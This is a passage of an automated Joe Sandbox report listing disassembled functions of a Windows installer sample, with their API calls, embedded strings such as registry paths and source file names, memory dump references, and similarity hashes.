Instruction ID: a682e52b041ffd5d738e89efc8eda8ea5ad4f72835306c39ceff0f6c5d0f8521
Opcode Fuzzy Hash: 8c738c535b180d2b59e81e6c315bf69d797fc0cb7f262e6cb5c31c24c28171ef
Instruction Fuzzy Hash: B841AFB5E00159EFCB20DF98C881AAEBFB5FF44B10F1588A9EA00A7291D7319E41DF50

Function 005010B5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 130registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000001,00000000,00000000,00000000,00000000,00000000), ref: 0050112B
RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 00501163

Strings

regutil.cpp, xrefs: 005011A9

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: QueryValue
String ID: regutil.cpp
API String ID: 3660427363-955085611
Opcode ID: b2194b533e8efaafc67b1d2a29f6f45c60edf97c6cf98a6792f7c56b8701dfc1
Instruction ID: 951e7571c19f47117098e043abae5f519afd02541bbed4463778781fccc76fa4
Opcode Fuzzy Hash: b2194b533e8efaafc67b1d2a29f6f45c60edf97c6cf98a6792f7c56b8701dfc1
Instruction Fuzzy Hash: D141A136D0052ABBDB249F95CC41AAEBFB9FF00350F10856EEA10A7290D7719E11DB95

Function 004F66D0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMONLIBRARYCODE

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(0050B518,00000000,00000006,00000001,comres.dll,?,00000000,?,00000000,?,?,00000000,00000006,?,comres.dll,?), ref: 004F67A3
GetLastError.KERNEL32 ref: 004F67BF

Strings

comres.dll, xrefs: 004F674A, 004F6798, 004F67D4

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: ByteCharErrorLastMultiWide
String ID: comres.dll
API String ID: 203985260-246242247
Opcode ID: e294cefa3a00f51fbc575d1fb0a29b04e9d31e95ca22732c9adb90980a1a060c
Instruction ID: f7df0b5985b7a560f96e8312e092babef8d49fd77f06f5c53917902552e201a1
Opcode Fuzzy Hash: e294cefa3a00f51fbc575d1fb0a29b04e9d31e95ca22732c9adb90980a1a060c
Instruction Fuzzy Hash: 0E31183060021DABDB217F55C885ABB7BE99F41718F16016BFA1487391EB78CD00D7A9

Function 00508F7A Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00508E44: lstrlenW.KERNEL32(00000100,?,?,?,00509217,000002C0,00000100,00000100,00000100,?,?,?,004E7D87,?,?,000001BC), ref: 00508E69

RegCloseKey.ADVAPI32(00000000,?,?,00000000,?,00000000,?,?,?,00000000,wininet.dll,?,0050B500,wininet.dll,?), ref: 0050907A
RegCloseKey.ADVAPI32(?,?,?,00000000,?,00000000,?,?,?,00000000,wininet.dll,?,0050B500,wininet.dll,?), ref: 00509087

Part of subcall function 00500F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,0052AAA0,00000000,?,005057E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00500F80

Part of subcall function 00500E4F: RegEnumKeyExW.ADVAPI32(00000000,000002C0,00000410,00000002,00000000,00000000,00000000,00000000,00000410,00000002,00000100,00000000,00000000,?,?,004E8E1B), ref: 00500EAA
Part of subcall function 00500E4F: RegQueryInfoKeyW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,?,?,004E8E1B,00000000), ref: 00500EC8

Strings

wininet.dll, xrefs: 00508FEF, 0050903C

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: Close$EnumInfoOpenQuerylstrlen
String ID: wininet.dll
API String ID: 2680864210-3354682871
Opcode ID: ba13139bfc69cdc570578fbb492c388761c68c743924f388a6f8d5d341ad6d5a
Instruction ID: d3b7b2d8fdf9e3b3c75e73e3f39b475df56e7608bc93585f06e873ac1c6a07a9
Opcode Fuzzy Hash: ba13139bfc69cdc570578fbb492c388761c68c743924f388a6f8d5d341ad6d5a
Instruction Fuzzy Hash: CA311732C0112AEBCF21AFA4C9989AEBF79FF44710F514179EA10761A2D7318E50AB90

Function 0050939E Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 103registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00508E44: lstrlenW.KERNEL32(00000100,?,?,?,00509217,000002C0,00000100,00000100,00000100,?,?,?,004E7D87,?,?,000001BC), ref: 00508E69

RegCloseKey.ADVAPI32(00000000,00000000,?,00000000,00000000,00000000,00000000,?), ref: 00509483
RegCloseKey.ADVAPI32(00000001,00000000,?,00000000,00000000,00000000,00000000,?), ref: 0050949D

Part of subcall function 00500BE9: RegCreateKeyExW.ADVAPI32(00000001,00000000,00000000,00000000,00000000,00000001,00000000,?,00000000,00000001,?,?,004D061A,?,00000000,00020006), ref: 00500C0E

Part of subcall function 005014F4: RegSetValueExW.ADVAPI32(00020006,00510D10,00000000,00000001,?,00000000,?,000000FF,00000000,00000000,?,?,004CF335,00000000,?,00020006), ref: 00501527

Part of subcall function 005014F4: RegDeleteValueW.ADVAPI32(00020006,00510D10,00000000,?,?,004CF335,00000000,?,00020006,?,00510D10,00020006,00000000,?,?,?), ref: 00501557

Part of subcall function 005014A6: RegSetValueExW.ADVAPI32(?,00000005,00000000,00000004,?,00000004,00000001,?,004CF28D,00510D10,Resume,00000005,?,00000000,00000000,00000000), ref: 005014BB

Strings

%ls\%ls, xrefs: 005093FF

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: Value$Close$CreateDeletelstrlen
String ID: %ls\%ls
API String ID: 3924016894-2125769799
Opcode ID: c0f93962dad3edd263f1ddd51e5479fd4f21fee76a09bbbdc4065c12744c62ea
Instruction ID: 9dd13264078b235e140c938444316efc52daabc408c9b769fa616dd668caedac
Opcode Fuzzy Hash: c0f93962dad3edd263f1ddd51e5479fd4f21fee76a09bbbdc4065c12744c62ea
Instruction Fuzzy Hash: 4F311776C0116EBFCF229F94CD4589EBFB9FF44310B55416AFA04A6262D7318E11EB90

Function 004C3A4D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 70COMMON

Download Yara Rule

APIs

_memcpy_s.LIBCMT ref: 004C3AB0

Strings

wininet.dll, xrefs: 004C3A6E
crypt32.dll, xrefs: 004C3A6D, 004C3AAC, 004C3AAE

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: _memcpy_s
String ID: crypt32.dll$wininet.dll
API String ID: 2001391462-82500532
Opcode ID: 0011009348c22b5e832ea82858c93897483b8e9d66932b506b87b8fd8fea0445
Instruction ID: 08cfe0d84f39385f7b74a35d2b83ca1fb9e55c8a163479c7709d8880ce9b8b59
Opcode Fuzzy Hash: 0011009348c22b5e832ea82858c93897483b8e9d66932b506b87b8fd8fea0445
Instruction Fuzzy Hash: 5C115E75600219ABCF08DE19CD85EABBF69EF95394B14802EFC058B311D275EA20CAE4

Function 005014F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63registryCOMMON

Download Yara Rule

APIs

RegSetValueExW.ADVAPI32(00020006,00510D10,00000000,00000001,?,00000000,?,000000FF,00000000,00000000,?,?,004CF335,00000000,?,00020006), ref: 00501527
RegDeleteValueW.ADVAPI32(00020006,00510D10,00000000,?,?,004CF335,00000000,?,00020006,?,00510D10,00020006,00000000,?,?,?), ref: 00501557

Strings

regutil.cpp, xrefs: 0050158B

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: Value$Delete
String ID: regutil.cpp
API String ID: 1738766685-955085611
Opcode ID: 8fd6452aa7c0a47d840ac64f78a3feddf3b997f0eb40e0e7bd8eb9709ca88476
Instruction ID: 24373a9b4788b01684e323fb7d3095ee4d1b4a4549ca6283aefa37be364471c3
Opcode Fuzzy Hash: 8fd6452aa7c0a47d840ac64f78a3feddf3b997f0eb40e0e7bd8eb9709ca88476
Instruction Fuzzy Hash: 42110A36D11936B7DB314E944C05BAE7E14BB44760F150125BD02BE1D0EA31DD20AFEA

Function 004CDDB3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(00000000,00000000,00000000,000000FF,?,000000FF,IGNOREDEPENDENCIES,00000000,?,?,004E7691,00000000,IGNOREDEPENDENCIES,00000000,?,0050B518), ref: 004CDE04

Strings

Failed to copy the property value., xrefs: 004CDE38
IGNOREDEPENDENCIES, xrefs: 004CDDBB

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: CompareString
String ID: Failed to copy the property value.$IGNOREDEPENDENCIES
API String ID: 1825529933-1412343224
Opcode ID: 9591227a9727ff16c01d9d104fd5e8830005815c233774244c2fbfb06e1bbaba
Instruction ID: 999abb4443a63863679263200913bebdf0cf753b3439bff8ec18cd13485d71d9
Opcode Fuzzy Hash: 9591227a9727ff16c01d9d104fd5e8830005815c233774244c2fbfb06e1bbaba
Instruction Fuzzy Hash: 9411363AA00215AFDB615F94CC84FAA77A2AF54320F21423FFA199F291C7749850CB89

Function 0050563F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(20000004,00000000,00000000,00000000,00000000,00000000,?,?,004D8E97,?,00000001,20000004,00000000,00000000,?,00000000), ref: 0050566E
SetNamedSecurityInfoW.ADVAPI32(00000000,?,000007D0,00000003,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,004D8E97,?), ref: 00505689

Strings

aclutil.cpp, xrefs: 005056AD

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: InfoNamedSecuritySleep
String ID: aclutil.cpp
API String ID: 2352087905-2159165307
Opcode ID: 0aa99c30fd3ec24fe73501328c5eeb62b2fb8f9759c0b9d32f451241e3026865
Instruction ID: 350f1bedb7372d79afd1d77ad14eb024f3d214d45b2beb9aa259a65904519155
Opcode Fuzzy Hash: 0aa99c30fd3ec24fe73501328c5eeb62b2fb8f9759c0b9d32f451241e3026865
Instruction Fuzzy Hash: F8017C37801529BBCF229E85CD05E9F7F65FF84750F060115BD0466260D6338D20AED0

Function 004C158C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53COMMON

Download Yara Rule

APIs

LCMapStringW.KERNEL32(0000007F,00000000,00000000,?,00000000,?,00000000,00000000,?,00000000,00000000,00000000,?,004C2318,00000000,00000000), ref: 004C15D0
GetLastError.KERNEL32(?,004C2318,00000000,00000000,?,00000200,?,005052B2,00000000,?,00000000,?,00000000,00000000,00000000), ref: 004C15DA

Strings

strutil.cpp, xrefs: 004C15FE

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: ErrorLastString
String ID: strutil.cpp
API String ID: 3728238275-3612885251
Opcode ID: 6bf483c4bd02e5eae8854da8b53858064fbdd73c908f1b6cdd19f8da4537abe0
Instruction ID: d14276d7c605d2dfbbe433bac08b84b84a23c3b66b81378c0de443f3726d8ee0
Opcode Fuzzy Hash: 6bf483c4bd02e5eae8854da8b53858064fbdd73c908f1b6cdd19f8da4537abe0
Instruction Fuzzy Hash: E901B93BA4113577CB219E954C44F5F7A98EF46760B05011EFE10AB361D664DC1087E4

Function 004D57BD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53COMMON

Download Yara Rule

APIs

CoInitializeEx.OLE32(00000000,00000000), ref: 004D57D9
CoUninitialize.OLE32(?,00000000,?,?,?,?,?,?,?), ref: 004D5833

Strings

Failed to initialize COM on cache thread., xrefs: 004D57E5

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: InitializeUninitialize
String ID: Failed to initialize COM on cache thread.
API String ID: 3442037557-3629645316
Opcode ID: 1c7d73674757b512293266d2923707a99199d27cb5f104e9e0ac3fc938c2b4cc
Instruction ID: 0d9497cd0295a727c3971837388a12a2ea4369b1b81266cdbb08e04dc44920ad
Opcode Fuzzy Hash: 1c7d73674757b512293266d2923707a99199d27cb5f104e9e0ac3fc938c2b4cc
Instruction Fuzzy Hash: B7016D7260061ABFDB059FA5D884EDAFBACFF08354B108126FA09C7221DB30AD54DBD4

Function 00503BF1 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00500F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,0052AAA0,00000000,?,005057E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00500F80

RegCloseKey.ADVAPI32(00000000,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,00020019,00000000,?,?,?,?,?,00503A8E,?), ref: 00503C62

Strings

EnableLUA, xrefs: 00503C34
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, xrefs: 00503C0C

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: CloseOpen
String ID: EnableLUA$SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
API String ID: 47109696-3551287084
Opcode ID: 023395a2f8f47380cabcd23f35c5e2b41f0037ed89823d60a3557f6c0ee792ca
Instruction ID: be7968feb02e0cc000200f5267302a4cef22356443201267b6ec85d7e0e24151
Opcode Fuzzy Hash: 023395a2f8f47380cabcd23f35c5e2b41f0037ed89823d60a3557f6c0ee792ca
Instruction Fuzzy Hash: 2D017C32910239FBE7209AA4D80ABAEFEACFF14721F2041A5A900F7091D3755E90A6D4

Function 004C5123 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(burn.clean.room,?,?,?,?,004C1104,?,?,00000000), ref: 004C5142
CompareStringW.KERNEL32(0000007F,00000001,?,0000000F,burn.clean.room,0000000F,?,?,?,?,004C1104,?,?,00000000), ref: 004C5172

Strings

burn.clean.room, xrefs: 004C512F, 004C513C, 004C5169

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: CompareStringlstrlen
String ID: burn.clean.room
API String ID: 1433953587-3055529264
Opcode ID: ca8b4a6d79b8339018596a6995d76720a1f0ddf0f425623aaff52c4f867fcd0a
Instruction ID: f226498e9a8e7202fe07ad3a590fb6cd610e4ca324016173e325f2c8080a4e7a
Opcode Fuzzy Hash: ca8b4a6d79b8339018596a6995d76720a1f0ddf0f425623aaff52c4f867fcd0a
Instruction Fuzzy Hash: F401A276D006206F93304B589C88F3BBBACEF25760B14411BF505C3710C774AC86D6A5

Function 00506920 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(00000000), ref: 00506985

Strings

`5w, xrefs: 00506985
atomutil.cpp, xrefs: 00506941

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: FreeString
String ID: `5w$atomutil.cpp
API String ID: 3341692771-1718187286
Opcode ID: 02f21fdfcfae959d2b08ea6fd453be9dc9585e0d5998a1e87dc48bdc5dbe6412
Instruction ID: 87d1d01f94ed64a6c4a8cc190fda082475c3817ec3ed5ece72493d547ec4daf4
Opcode Fuzzy Hash: 02f21fdfcfae959d2b08ea6fd453be9dc9585e0d5998a1e87dc48bdc5dbe6412
Instruction Fuzzy Hash: B801F936400128FBC7316A95DD05FAEFF78BF44B21F244959B900765D0C7B64E20E6E5

Function 004C6522 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?), ref: 004C6534

Part of subcall function 00500ACC: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,?,004C5EB2,00000000), ref: 00500AE0
Part of subcall function 00500ACC: GetProcAddress.KERNEL32(00000000), ref: 00500AE7
Part of subcall function 00500ACC: GetLastError.KERNEL32(?,?,?,004C5EB2,00000000), ref: 00500AFE

Part of subcall function 004C5CE2: RegCloseKey.ADVAPI32(00000000,?,00000000,CommonFilesDir,?,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion,00020119,00000000), ref: 004C5D68

Strings

Failed to get 64-bit folder., xrefs: 004C6557
Failed to set variant value., xrefs: 004C6571

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: AddressCloseCurrentErrorHandleLastModuleProcProcess
String ID: Failed to get 64-bit folder.$Failed to set variant value.
API String ID: 3109562764-2681622189
Opcode ID: c33955b58088fd74a288db7fe8c61e40eec22a9b025a0b93835b802ec0bd9af9
Instruction ID: 76a9c2227d7a16fa87a63a69f4e9abcd58ec1520b70cfa4d1836275da1a24fe3
Opcode Fuzzy Hash: c33955b58088fd74a288db7fe8c61e40eec22a9b025a0b93835b802ec0bd9af9
Instruction Fuzzy Hash: F601A232D01228BBCB21AB90DC06F9EBF38FF00721F21815AF80066184D6759F50DBD4

Function 004C33C7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,00000104,?,?,?,?,004C10DD,?,00000000), ref: 004C33E8
GetLastError.KERNEL32(?,?,?,?,004C10DD,?,00000000), ref: 004C33FF

Strings

pathutil.cpp, xrefs: 004C3423

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: ErrorFileLastModuleName
String ID: pathutil.cpp
API String ID: 2776309574-741606033
Opcode ID: 0a95bd930d7f17bd4eb9c3a36f47606c0258f01000815baf35cf64553c836a31
Instruction ID: 8393354148de30b81057e7b555fcd0c236ce2409d073295820678af0595d8061
Opcode Fuzzy Hash: 0a95bd930d7f17bd4eb9c3a36f47606c0258f01000815baf35cf64553c836a31
Instruction Fuzzy Hash: 70F04C7BA4013167D3725E565C45F5BFA58EB46B72B02812BFD00FB210D729DD0082F8

Function 004EE30F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 004EEBD2

Part of subcall function 004F1380: RaiseException.KERNEL32(?,?,?,004EEBF4,?,00000000,00000000,?,?,?,?,?,004EEBF4,?,00527EC8), ref: 004F13DF

__CxxThrowException@8.LIBVCRUNTIME ref: 004EEBEF

Strings

Unknown exception, xrefs: 004EEBFC

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: Unknown exception
API String ID: 3476068407-410509341
Opcode ID: a15e806d0a27ccce56f43a1ccfec3bca63b76f39e0cfe66917a6f99322c14236
Instruction ID: 3cb02732393682da186606334c5fcede24d5045a678898b2287945bc386c7ab5
Opcode Fuzzy Hash: a15e806d0a27ccce56f43a1ccfec3bca63b76f39e0cfe66917a6f99322c14236
Instruction Fuzzy Hash: 5AF0223580020CBACB00FAA7E806DBE376C5F00315B60416BFD24925D2EB39FA1682D9

Function 00504A05 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40COMMON

Download Yara Rule

APIs

GetFileSizeEx.KERNEL32(00000000,00000000,00000000,755734C0,?,?,?,004CBA1D,?,?,?,00000000,00000000), ref: 00504A1D
GetLastError.KERNEL32(?,?,?,004CBA1D,?,?,?,00000000,00000000,?,?,?,00000000,7744C3F0,00000000), ref: 00504A27

Strings

fileutil.cpp, xrefs: 00504A4B

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: ErrorFileLastSize
String ID: fileutil.cpp
API String ID: 464720113-2967768451
Opcode ID: 0adb5cdb182afba65455a253b7610dadc8a6c26c11e5f6a551c3c8f3206af504
Instruction ID: 01d69cc8bbf7328e5a3a351b32f3478e296534d202c9e03fea69505eee2413fe
